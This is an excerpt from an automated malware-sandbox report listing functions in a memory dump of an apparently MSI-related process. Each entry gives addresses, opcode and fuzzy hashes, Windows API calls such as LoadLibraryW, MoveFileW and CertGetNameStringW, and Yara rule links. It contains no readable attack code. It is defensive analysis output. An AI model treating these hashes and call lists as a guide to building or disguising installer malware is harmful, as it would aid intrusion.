Instruction Fuzzy Hash: EC91C622A08E8581E6668E78E45237F6371EF497D0F144332DE5DA66E5DF3CB0B18A00

Function 00007FF6D9C3A464 Relevance: .2, Instructions: 207COMMONLIBRARYCODE

Download Yara Rule

Memory Dump Source

Source File: 0000000C.00000002.1447928637.00007FF6D9BF1000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF6D9BF0000, based on PE: true

Associated: 0000000C.00000002.1447903010.00007FF6D9BF0000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 0000000C.00000002.1447979243.00007FF6D9C52000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 0000000C.00000002.1448006981.00007FF6D9C6C000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 0000000C.00000002.1448030058.00007FF6D9C71000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 0000000C.00000002.1448030058.00007FF6D9C77000.00000002.00000001.01000000.00000004.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_12_2_7ff6d9bf0000_MSIC534.jbxd

Similarity

API ID: _invalid_parameter_noinfo
String ID:
API String ID: 3215553584-0
Opcode ID: 794c11211927649d932b3691f66082c283c136d74ade2bf0228d4f4f8ac29e23
Instruction ID: f114207787ed1ea04d90917ab64b3ec865d85fb7be6d38b4caccec6df6bf1eb7
Opcode Fuzzy Hash: 794c11211927649d932b3691f66082c283c136d74ade2bf0228d4f4f8ac29e23
Instruction Fuzzy Hash: B6816C72A04A5186EB609F29D4957BD33B0FB84BD8F148637EE1E87B89DF38D0618740

Function 00007FF6D9C3F948 Relevance: .2, Instructions: 198COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000000C.00000002.1447928637.00007FF6D9BF1000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF6D9BF0000, based on PE: true

Associated: 0000000C.00000002.1447903010.00007FF6D9BF0000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 0000000C.00000002.1447979243.00007FF6D9C52000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 0000000C.00000002.1448006981.00007FF6D9C6C000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 0000000C.00000002.1448030058.00007FF6D9C71000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 0000000C.00000002.1448030058.00007FF6D9C77000.00000002.00000001.01000000.00000004.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_12_2_7ff6d9bf0000_MSIC534.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: ff972ccb01192226430f2d174c616ee17f645c7a14bb65346abcb5110e159519
Instruction ID: 443726c4330e61657eeab15cbc67f4c07caff218719177ad8a2a6898d7980fdf
Opcode Fuzzy Hash: ff972ccb01192226430f2d174c616ee17f645c7a14bb65346abcb5110e159519
Instruction Fuzzy Hash: 2581C072B1878186F7748F29A48036E6AB0FB497D4F504636DA9D87B89DF3CE5108B00

Function 00007FF6D9C2FD1C Relevance: .1, Instructions: 146COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000000C.00000002.1447928637.00007FF6D9BF1000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF6D9BF0000, based on PE: true

Associated: 0000000C.00000002.1447903010.00007FF6D9BF0000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 0000000C.00000002.1447979243.00007FF6D9C52000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 0000000C.00000002.1448006981.00007FF6D9C6C000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 0000000C.00000002.1448030058.00007FF6D9C71000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 0000000C.00000002.1448030058.00007FF6D9C77000.00000002.00000001.01000000.00000004.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_12_2_7ff6d9bf0000_MSIC534.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 13b0105106c40ed4eba3e74a7f849f42d06bf884942e094675a3d9d0a39c6c1d
Instruction ID: 8506b84f54e78fd8ad0eb93fa2f1c31c295eb1aefab220855d8045692c61358b
Opcode Fuzzy Hash: 13b0105106c40ed4eba3e74a7f849f42d06bf884942e094675a3d9d0a39c6c1d
Instruction Fuzzy Hash: 68515076B18B59C6E7358F29C05422C37B0EB49B98F246132CA4D9B795DF3AE863C740

Function 00007FF6D9C2F4FC Relevance: .1, Instructions: 146COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000000C.00000002.1447928637.00007FF6D9BF1000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF6D9BF0000, based on PE: true

Associated: 0000000C.00000002.1447903010.00007FF6D9BF0000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 0000000C.00000002.1447979243.00007FF6D9C52000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 0000000C.00000002.1448006981.00007FF6D9C6C000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 0000000C.00000002.1448030058.00007FF6D9C71000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 0000000C.00000002.1448030058.00007FF6D9C77000.00000002.00000001.01000000.00000004.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_12_2_7ff6d9bf0000_MSIC534.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 89c7a4a40dae9ae74dfa0c7d26b586ba0f48d79d37668169046dc22e6404ff41
Instruction ID: 3dd2efe273fbd60a44a721067916a6cd9f1f9b75ece7b1fb25fae4d291e588ca
Opcode Fuzzy Hash: 89c7a4a40dae9ae74dfa0c7d26b586ba0f48d79d37668169046dc22e6404ff41
Instruction Fuzzy Hash: C7515476B18655C6E7348F29C05463C37B0EB55BA8F246132DA4D977A4CF3AE863C740

Function 00007FF6D9C2F90C Relevance: .1, Instructions: 146COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000000C.00000002.1447928637.00007FF6D9BF1000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF6D9BF0000, based on PE: true

Associated: 0000000C.00000002.1447903010.00007FF6D9BF0000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 0000000C.00000002.1447979243.00007FF6D9C52000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 0000000C.00000002.1448006981.00007FF6D9C6C000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 0000000C.00000002.1448030058.00007FF6D9C71000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 0000000C.00000002.1448030058.00007FF6D9C77000.00000002.00000001.01000000.00000004.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_12_2_7ff6d9bf0000_MSIC534.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 958af43b5455bf2407519b3ecd724e91f302b1c621c373eda0090ceb08c00e34
Instruction ID: 54d59fcb7789c11d23ed44f108815c03970bc6f4c97f8f692039ce98b6a711ec
Opcode Fuzzy Hash: 958af43b5455bf2407519b3ecd724e91f302b1c621c373eda0090ceb08c00e34
Instruction Fuzzy Hash: B6514436B18A59C6E7349F29D05022C77B0EB48B98F246136CA4D97795CF3AE963C740

Function 00007FF6D9C2FB18 Relevance: .1, Instructions: 145COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000000C.00000002.1447928637.00007FF6D9BF1000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF6D9BF0000, based on PE: true

Associated: 0000000C.00000002.1447903010.00007FF6D9BF0000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 0000000C.00000002.1447979243.00007FF6D9C52000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 0000000C.00000002.1448006981.00007FF6D9C6C000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 0000000C.00000002.1448030058.00007FF6D9C71000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 0000000C.00000002.1448030058.00007FF6D9C77000.00000002.00000001.01000000.00000004.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_12_2_7ff6d9bf0000_MSIC534.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: b6ae896f4f730ecb132dcea19f42c89ba9b02889226b951f8076e892e6296241
Instruction ID: 5ca431c9fd2517f6c83c318f6a62ae8631d6ef9374e42d00fea851c80c59322a
Opcode Fuzzy Hash: b6ae896f4f730ecb132dcea19f42c89ba9b02889226b951f8076e892e6296241
Instruction Fuzzy Hash: 56517E36B18659C6E7748F29C05022C37B1EB45F98F246132CE4D977A5CF3AE862CB80

Function 00007FF6D9C2F2F8 Relevance: .1, Instructions: 145COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000000C.00000002.1447928637.00007FF6D9BF1000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF6D9BF0000, based on PE: true

Associated: 0000000C.00000002.1447903010.00007FF6D9BF0000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 0000000C.00000002.1447979243.00007FF6D9C52000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 0000000C.00000002.1448006981.00007FF6D9C6C000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 0000000C.00000002.1448030058.00007FF6D9C71000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 0000000C.00000002.1448030058.00007FF6D9C77000.00000002.00000001.01000000.00000004.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_12_2_7ff6d9bf0000_MSIC534.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 6b9cd13e66553fd8c4517fa76dc8a4af09b0066961e128d371c74e405cdbe00d
Instruction ID: 50f911d3c8ec0ed1fabcfa318d2416cbd2777d14ee318e43321d5e1fd40734ec
Opcode Fuzzy Hash: 6b9cd13e66553fd8c4517fa76dc8a4af09b0066961e128d371c74e405cdbe00d
Instruction Fuzzy Hash: B2516E36B18659C6E7348F29C05063C37B0EB49B98F386132CA4D977A4DF7AE862C740

Function 00007FF6D9C2F708 Relevance: .1, Instructions: 145COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000000C.00000002.1447928637.00007FF6D9BF1000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF6D9BF0000, based on PE: true

Associated: 0000000C.00000002.1447903010.00007FF6D9BF0000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 0000000C.00000002.1447979243.00007FF6D9C52000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 0000000C.00000002.1448006981.00007FF6D9C6C000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 0000000C.00000002.1448030058.00007FF6D9C71000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 0000000C.00000002.1448030058.00007FF6D9C77000.00000002.00000001.01000000.00000004.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_12_2_7ff6d9bf0000_MSIC534.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: e081bc5d7bfd2ee68d489027360a41bc3b7ef8b2fb9564c51f1fe64475db137d
Instruction ID: c3a7663f41553df947892e6bf7719259416169a9157db81d8fac9bce01e85390
Opcode Fuzzy Hash: e081bc5d7bfd2ee68d489027360a41bc3b7ef8b2fb9564c51f1fe64475db137d
Instruction Fuzzy Hash: 56516D76B18659C6E7748F29C15022C77B0EB49F98F246132CE4D97795CF3AE862C780

Function 00007FF6D9C3C514 Relevance: .1, Instructions: 125COMMONLIBRARYCODE

Download Yara Rule

Memory Dump Source

Source File: 0000000C.00000002.1447928637.00007FF6D9BF1000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF6D9BF0000, based on PE: true

Associated: 0000000C.00000002.1447903010.00007FF6D9BF0000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 0000000C.00000002.1447979243.00007FF6D9C52000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 0000000C.00000002.1448006981.00007FF6D9C6C000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 0000000C.00000002.1448030058.00007FF6D9C71000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 0000000C.00000002.1448030058.00007FF6D9C77000.00000002.00000001.01000000.00000004.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_12_2_7ff6d9bf0000_MSIC534.jbxd

Similarity

API ID: ErrorFreeHeapLast
String ID:
API String ID: 485612231-0
Opcode ID: 7c354f88c1c44c2ece779ca759ea73176f561d08044f83dab54d900259ffb089
Instruction ID: ce00f2b5541ace87eb2ee6986de15416006ad613037f495e9fdc1491bab0ee76
Opcode Fuzzy Hash: 7c354f88c1c44c2ece779ca759ea73176f561d08044f83dab54d900259ffb089
Instruction Fuzzy Hash: 1941D162718A5482EF04DF6AD91416D73B1BB58FD4B49A033EE0DD7B68EE3CC4528340

Function 00007FF6D9C4CB40 Relevance: .0, Instructions: 50COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000000C.00000002.1447928637.00007FF6D9BF1000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF6D9BF0000, based on PE: true

Associated: 0000000C.00000002.1447903010.00007FF6D9BF0000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 0000000C.00000002.1447979243.00007FF6D9C52000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 0000000C.00000002.1448006981.00007FF6D9C6C000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 0000000C.00000002.1448030058.00007FF6D9C71000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 0000000C.00000002.1448030058.00007FF6D9C77000.00000002.00000001.01000000.00000004.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_12_2_7ff6d9bf0000_MSIC534.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 5b5d3277f4911141179525d391ca3b68cfba31e13b1b04252a50c7f0ab254f01
Instruction ID: befbb6c55e4baed2c213416dce011937e086d664f5973c2befe16b46eb1aed83
Opcode Fuzzy Hash: 5b5d3277f4911141179525d391ca3b68cfba31e13b1b04252a50c7f0ab254f01
Instruction Fuzzy Hash: FB1152B1B5D6528AF7999F28945137D76B0AB483C1F50803AD48DC6AE4CE3DA4B1CF40

Function 00007FF6D9C28CE8 Relevance: .0, Instructions: 2COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000000C.00000002.1447928637.00007FF6D9BF1000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF6D9BF0000, based on PE: true

Associated: 0000000C.00000002.1447903010.00007FF6D9BF0000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 0000000C.00000002.1447979243.00007FF6D9C52000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 0000000C.00000002.1448006981.00007FF6D9C6C000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 0000000C.00000002.1448030058.00007FF6D9C71000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 0000000C.00000002.1448030058.00007FF6D9C77000.00000002.00000001.01000000.00000004.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_12_2_7ff6d9bf0000_MSIC534.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: b4b8c9ab3e05c082a3753a4db46469dcbd39ec8e9c9cc20717fbe86670436863
Instruction ID: 649a175cc1f4b68342dc7596fe6a4ce622b316149be44fee06d301c537217f17
Opcode Fuzzy Hash: b4b8c9ab3e05c082a3753a4db46469dcbd39ec8e9c9cc20717fbe86670436863
Instruction Fuzzy Hash: 21A00121948A02E1E6A58F40A85013C2274AB64790B802032D00D910A0DE3CA9A48210

Function 00007FF6D9BF1210 Relevance: 35.3, APIs: 18, Strings: 2, Instructions: 310libraryloaderCOMMON

Download Yara Rule

APIs

LoadLibraryW.KERNEL32 ref: 00007FF6D9BF1288
GetLastError.KERNEL32 ref: 00007FF6D9BF12A9

Part of subcall function 00007FF6D9BF17D0: LocalFree.KERNEL32(?,?,?,?,?,?,?,?,00007FF6D9BF38C9), ref: 00007FF6D9BF1811

GetProcAddress.KERNEL32 ref: 00007FF6D9BF12C3
FreeLibrary.KERNEL32 ref: 00007FF6D9BF12D5
GetLastError.KERNEL32 ref: 00007FF6D9BF12DF
FreeLibrary.KERNEL32 ref: 00007FF6D9BF1672

Strings

ConvertStringSidToSidW, xrefs: 00007FF6D9BF12B9
Advapi32.dll, xrefs: 00007FF6D9BF1281

Memory Dump Source

Source File: 0000000C.00000002.1447928637.00007FF6D9BF1000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF6D9BF0000, based on PE: true

Associated: 0000000C.00000002.1447903010.00007FF6D9BF0000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 0000000C.00000002.1447979243.00007FF6D9C52000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 0000000C.00000002.1448006981.00007FF6D9C6C000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 0000000C.00000002.1448030058.00007FF6D9C71000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 0000000C.00000002.1448030058.00007FF6D9C77000.00000002.00000001.01000000.00000004.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_12_2_7ff6d9bf0000_MSIC534.jbxd

Similarity

API ID: FreeLibrary$ErrorLast$AddressLoadLocalProc
String ID: Advapi32.dll$ConvertStringSidToSidW
API String ID: 541295828-1129428314
Opcode ID: 90893dfa8f7085809678bfb929613cad971c142c9f422bfed67c6c3f7caf1b5a
Instruction ID: 0c5c608c05a29481cad5e2cf04988fbdd15be824f54b38efddeb44b1a7f84c60
Opcode Fuzzy Hash: 90893dfa8f7085809678bfb929613cad971c142c9f422bfed67c6c3f7caf1b5a
Instruction Fuzzy Hash: 64D19A7AB0AB458AEB10CF60E4402BD33B5FB45788F05583ADE4E93A59DF39E565C700

Function 00007FF6D9BF5240 Relevance: 26.6, APIs: 13, Strings: 2, Instructions: 356fileCOMMON

Download Yara Rule

APIs

GetTempFileNameW.KERNEL32 ref: 00007FF6D9BF529C
LocalFree.KERNEL32 ref: 00007FF6D9BF5375
MoveFileW.KERNEL32 ref: 00007FF6D9BF5549
LocalFree.KERNEL32 ref: 00007FF6D9BF5590
DeleteFileW.KERNEL32 ref: 00007FF6D9BF55CF
LocalFree.KERNEL32 ref: 00007FF6D9BF5643
LocalFree.KERNEL32 ref: 00007FF6D9BF5700
LocalFree.KERNEL32 ref: 00007FF6D9BF574E
_invalid_parameter_noinfo_noreturn.LIBCMT ref: 00007FF6D9BF578F
_invalid_parameter_noinfo_noreturn.LIBCMT ref: 00007FF6D9BF5795
_invalid_parameter_noinfo_noreturn.LIBCMT ref: 00007FF6D9BF579B
_invalid_parameter_noinfo_noreturn.LIBCMT ref: 00007FF6D9BF57A1
_invalid_parameter_noinfo_noreturn.LIBCMT ref: 00007FF6D9BF57A7

Strings

URL, xrefs: 00007FF6D9BF5295, 00007FF6D9BF55B7
url, xrefs: 00007FF6D9BF53A2, 00007FF6D9BF55B0

Memory Dump Source

Source File: 0000000C.00000002.1447928637.00007FF6D9BF1000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF6D9BF0000, based on PE: true

Associated: 0000000C.00000002.1447903010.00007FF6D9BF0000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 0000000C.00000002.1447979243.00007FF6D9C52000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 0000000C.00000002.1448006981.00007FF6D9C6C000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 0000000C.00000002.1448030058.00007FF6D9C71000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 0000000C.00000002.1448030058.00007FF6D9C77000.00000002.00000001.01000000.00000004.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_12_2_7ff6d9bf0000_MSIC534.jbxd

Similarity

API ID: FreeLocal_invalid_parameter_noinfo_noreturn$File$DeleteMoveNameTemp
String ID: URL$url
API String ID: 3276202954-346267919
Opcode ID: 84e8fc73107c6b071d8778d98808e208780d956718d1f2a5d8bd4a8d3a411413
Instruction ID: f1b471027d6b85900924d7055e97a9681cb5db5742c05aeb6f872f9c23e6e5f2
Opcode Fuzzy Hash: 84e8fc73107c6b071d8778d98808e208780d956718d1f2a5d8bd4a8d3a411413
Instruction Fuzzy Hash: 05F1DD66F19B5589FB008FA4D8442BD23B1FB85798F411233DE5D63AA9DFB8A5A4C300

Function 00007FF6D9BF9EC0 Relevance: 24.8, APIs: 12, Strings: 2, Instructions: 309COMMON

Download Yara Rule

APIs

LocalFree.KERNEL32 ref: 00007FF6D9BFA043
LocalFree.KERNEL32 ref: 00007FF6D9BFA0AF
LocalFree.KERNEL32 ref: 00007FF6D9BFA109
LocalFree.KERNEL32 ref: 00007FF6D9BFA205
LocalFree.KERNEL32 ref: 00007FF6D9BFA285
LocalFree.KERNEL32 ref: 00007FF6D9BFA309
_invalid_parameter_noinfo_noreturn.LIBCMT ref: 00007FF6D9BFA359
_invalid_parameter_noinfo_noreturn.LIBCMT ref: 00007FF6D9BFA35F
_invalid_parameter_noinfo_noreturn.LIBCMT ref: 00007FF6D9BFA36B
_invalid_parameter_noinfo_noreturn.LIBCMT ref: 00007FF6D9BFA371
_invalid_parameter_noinfo_noreturn.LIBCMT ref: 00007FF6D9BFA377
_invalid_parameter_noinfo_noreturn.LIBCMT ref: 00007FF6D9BFA383

Strings

\\?\, xrefs: 00007FF6D9BFA156
\\?\UNC\, xrefs: 00007FF6D9BF9F45

Memory Dump Source

Source File: 0000000C.00000002.1447928637.00007FF6D9BF1000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF6D9BF0000, based on PE: true

Associated: 0000000C.00000002.1447903010.00007FF6D9BF0000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 0000000C.00000002.1447979243.00007FF6D9C52000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 0000000C.00000002.1448006981.00007FF6D9C6C000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 0000000C.00000002.1448030058.00007FF6D9C71000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 0000000C.00000002.1448030058.00007FF6D9C77000.00000002.00000001.01000000.00000004.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_12_2_7ff6d9bf0000_MSIC534.jbxd

Similarity

API ID: FreeLocal_invalid_parameter_noinfo_noreturn
String ID: \\?\$\\?\UNC\
API String ID: 195334829-3019864461
Opcode ID: fc103fa8d190d4e9f3f59991f74738a8d5f5289dc901af58efed2721ddbfdc34
Instruction ID: 209e8c309204b5219b7f1c38eb5bde35984739b79171bdbb657f96c033c14513
Opcode Fuzzy Hash: fc103fa8d190d4e9f3f59991f74738a8d5f5289dc901af58efed2721ddbfdc34
Instruction Fuzzy Hash: 11E1DF26F19B8585FB148F68D4043BD23B1BB96B98F015732DE5C626A5EF39E5A0C380

Function 00007FF6D9C370A4 Relevance: 19.7, APIs: 6, Strings: 5, Instructions: 411COMMON

Download Yara Rule

APIs

_invalid_parameter_noinfo.LIBCMT ref: 00007FF6D9C370DC
_invalid_parameter_noinfo.LIBCMT ref: 00007FF6D9C371A9

Strings

0, xrefs: 00007FF6D9C371EB
0, xrefs: 00007FF6D9C3717B
0, xrefs: 00007FF6D9C3727C
0, xrefs: 00007FF6D9C3728E
0, xrefs: 00007FF6D9C371D8

Memory Dump Source

Source File: 0000000C.00000002.1447928637.00007FF6D9BF1000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF6D9BF0000, based on PE: true

Associated: 0000000C.00000002.1447903010.00007FF6D9BF0000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 0000000C.00000002.1447979243.00007FF6D9C52000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 0000000C.00000002.1448006981.00007FF6D9C6C000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 0000000C.00000002.1448030058.00007FF6D9C71000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 0000000C.00000002.1448030058.00007FF6D9C77000.00000002.00000001.01000000.00000004.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_12_2_7ff6d9bf0000_MSIC534.jbxd

Similarity

API ID: _invalid_parameter_noinfo
String ID: 0$0$0$0$0
API String ID: 3215553584-4235325143
Opcode ID: b24385261a155569ef5ab7d3b3c7fbfe2ef6433bdc03180ed18f33fce35c48fd
Instruction ID: e390688d30215adba282287574ca4d6dfd0a93bb4cce70cc2bd40de00aa7af60
Opcode Fuzzy Hash: b24385261a155569ef5ab7d3b3c7fbfe2ef6433bdc03180ed18f33fce35c48fd
Instruction Fuzzy Hash: 72E1C132B0E68685F7618F3985902BD3BB5AB15BC4F549033DA8DC7782DE3DA9798700

Function 00007FF6D9C50E00 Relevance: 19.4, APIs: 10, Strings: 1, Instructions: 160COMMON

Download Yara Rule

APIs

LocalFree.KERNEL32 ref: 00007FF6D9C50E41
_invalid_parameter_noinfo_noreturn.LIBCMT ref: 00007FF6D9C50E65
LocalFree.KERNEL32 ref: 00007FF6D9C50EB1
_invalid_parameter_noinfo_noreturn.LIBCMT ref: 00007FF6D9C50ED5
LocalFree.KERNEL32 ref: 00007FF6D9C50F1B
_invalid_parameter_noinfo_noreturn.LIBCMT ref: 00007FF6D9C50F3C
LocalFree.KERNEL32 ref: 00007FF6D9C50F91
_invalid_parameter_noinfo_noreturn.LIBCMT ref: 00007FF6D9C50FB5
LocalFree.KERNEL32 ref: 00007FF6D9C51001
_invalid_parameter_noinfo_noreturn.LIBCMT ref: 00007FF6D9C51025

Strings

msi, xrefs: 00007FF6D9C50FD1

Memory Dump Source

Source File: 0000000C.00000002.1447928637.00007FF6D9BF1000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF6D9BF0000, based on PE: true

Associated: 0000000C.00000002.1447903010.00007FF6D9BF0000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 0000000C.00000002.1447979243.00007FF6D9C52000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 0000000C.00000002.1448006981.00007FF6D9C6C000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 0000000C.00000002.1448030058.00007FF6D9C71000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 0000000C.00000002.1448030058.00007FF6D9C77000.00000002.00000001.01000000.00000004.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_12_2_7ff6d9bf0000_MSIC534.jbxd

Similarity

API ID: FreeLocal_invalid_parameter_noinfo_noreturn
String ID: msi
API String ID: 195334829-2402448040
Opcode ID: a3ec3bcb67ca612cb4e6205c1f17b046e47c90cb8fa826a531b38a851e18886d
Instruction ID: 885b775c05f963ad4e9340492a4a824deeecd7edd276b21e448be889e7fd23b3
Opcode Fuzzy Hash: a3ec3bcb67ca612cb4e6205c1f17b046e47c90cb8fa826a531b38a851e18886d
Instruction Fuzzy Hash: 4E516D65F1968394FE84AF69E84937C63B0AF947C0F901A33CA4DD6674EF6CA5A4C340

Function 00007FF6D9C00A30 Relevance: 17.7, APIs: 8, Strings: 2, Instructions: 220memoryCOMMON

Download Yara Rule

APIs

LocalAlloc.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,?,00000000,ios_base::failbit set), ref: 00007FF6D9C00AE0
LocalAlloc.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,?,00000000,ios_base::failbit set), ref: 00007FF6D9C00B35
__std_exception_copy.LIBVCRUNTIME ref: 00007FF6D9C00BA5
LocalFree.KERNEL32 ref: 00007FF6D9C00BEC

Strings

ios_base::failbit set, xrefs: 00007FF6D9C00A34
iostream, xrefs: 00007FF6D9C00D60

Memory Dump Source

Source File: 0000000C.00000002.1447928637.00007FF6D9BF1000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF6D9BF0000, based on PE: true

Associated: 0000000C.00000002.1447903010.00007FF6D9BF0000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 0000000C.00000002.1447979243.00007FF6D9C52000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 0000000C.00000002.1448006981.00007FF6D9C6C000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 0000000C.00000002.1448030058.00007FF6D9C71000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 0000000C.00000002.1448030058.00007FF6D9C77000.00000002.00000001.01000000.00000004.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_12_2_7ff6d9bf0000_MSIC534.jbxd

Similarity

API ID: Local$Alloc$Free__std_exception_copy
String ID: ios_base::failbit set$iostream
API String ID: 448282989-302468714
Opcode ID: 10b159b20428453308a30ed0b0ce3c9a021ea7a286194df649f518ca31c0e409
Instruction ID: d2171c319f4d5458e02c18293e3abb36a6781ca3ad434801d8d0ae5adc1964fa
Opcode Fuzzy Hash: 10b159b20428453308a30ed0b0ce3c9a021ea7a286194df649f518ca31c0e409
Instruction Fuzzy Hash: 9481B162A19B8186EB50CF25E4403BDB3B0FB957D4F515232EA9D82795EF3CE1A4C700

Function 00007FF6D9BF2950 Relevance: 16.7, APIs: 11, Instructions: 207encryptionCOMMON

Download Yara Rule

APIs

#224.MSI ref: 00007FF6D9BF29D1
LocalFree.KERNEL32 ref: 00007FF6D9BF2A3B
LocalFree.KERNEL32 ref: 00007FF6D9BF2AA3
LocalFree.KERNEL32 ref: 00007FF6D9BF2B72
LocalFree.KERNEL32 ref: 00007FF6D9BF2BC4
CertFreeCertificateContext.CRYPT32 ref: 00007FF6D9BF2BE9

Part of subcall function 00007FF6D9BF3700: CertGetNameStringW.CRYPT32 ref: 00007FF6D9BF37AD

_invalid_parameter_noinfo_noreturn.LIBCMT ref: 00007FF6D9BF2C21
_invalid_parameter_noinfo_noreturn.LIBCMT ref: 00007FF6D9BF2C27
